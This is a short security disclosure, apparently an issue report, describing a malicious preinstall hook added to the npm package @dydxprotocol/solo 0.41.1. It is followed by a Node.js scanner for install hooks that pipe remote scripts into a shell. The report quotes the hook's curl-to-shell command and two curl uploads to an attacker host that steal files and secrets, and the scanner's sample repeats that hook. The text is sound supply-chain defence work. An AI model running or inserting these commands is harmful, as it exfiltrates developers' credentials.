Hey, I'm a security researcher from https://mend.io
This malicious code was found by us at https://Mend.io using our Supply Chain Defender technology
Looking at the diff here: https://my.diffend.io/npm/@dydxprotocol/solo/0.41.0/0.41.1
A preinstall was added:
"preinstall": "curl -s http://api.circle-cdn.com/ci.js | sh",
but this script contains code that looks malicious:
subprocess.getoutput("curl -X POST http://api.circle-cdn.com/uploader.php -F 'uploaded_file=@" + filename2 + "' -F 'submit=Upload'")
subprocess.getoutput('curl -X POST http://api.circle-cdn.com/api.php -d "textdata=' + allen + '"')
It seems to be stealing credentials and other secrets.
This applies to other packages of the ecosystem as well.
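An added example, not part of this report or of the Mend tooling: a small Node.js check that flags npm lifecycle hooks which fetch remote content and pipe it into a shell, the pattern used in the preinstall quoted above. The package name, version and hook text come from the report; the sample package.json is constructed for the example.

```javascript
// Added example (not from the original report): scan the lifecycle hooks in a
// package.json for the "fetch a remote script and pipe it into a shell" pattern.
const LIFECYCLE_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'prepare', 'preuninstall', 'postuninstall',
];

// A curl/wget invocation whose output is piped straight into an interpreter,
// e.g. "curl -s http://... | sh" or "wget -qO- http://... | bash".
const FETCH_PIPE_RE = /\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(sh|bash|zsh|node|python\d?)\b/;
// Any http(s) URL in an install hook is worth reviewing on its own.
const HTTP_URL_RE = /https?:\/\/[^\s'"]+/g;

// Returns one finding per suspicious hook; an empty array means nothing flagged.
function scanLifecycleScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const urls = cmd.match(HTTP_URL_RE) || [];
    const pipesToShell = FETCH_PIPE_RE.test(cmd);
    if (pipesToShell || urls.length > 0) {
      findings.push({
        hook,
        command: cmd,
        urls,
        pipesToShell,
        severity: pipesToShell ? 'high' : 'medium',
      });
    }
  }
  return findings;
}

// Constructed sample package.json reproducing the hook quoted in the report.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: '@dydxprotocol/solo',
  version: '0.41.1',
  scripts: {
    preinstall: "curl -s http://api.circle-cdn.com/ci.js | sh",
    build: 'tsc -p .',
  },
});

console.log(JSON.stringify(scanLifecycleScripts(SAMPLE_PACKAGE_JSON), null, 2));
```

Running installs with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) keeps such hooks from executing until they have been reviewed.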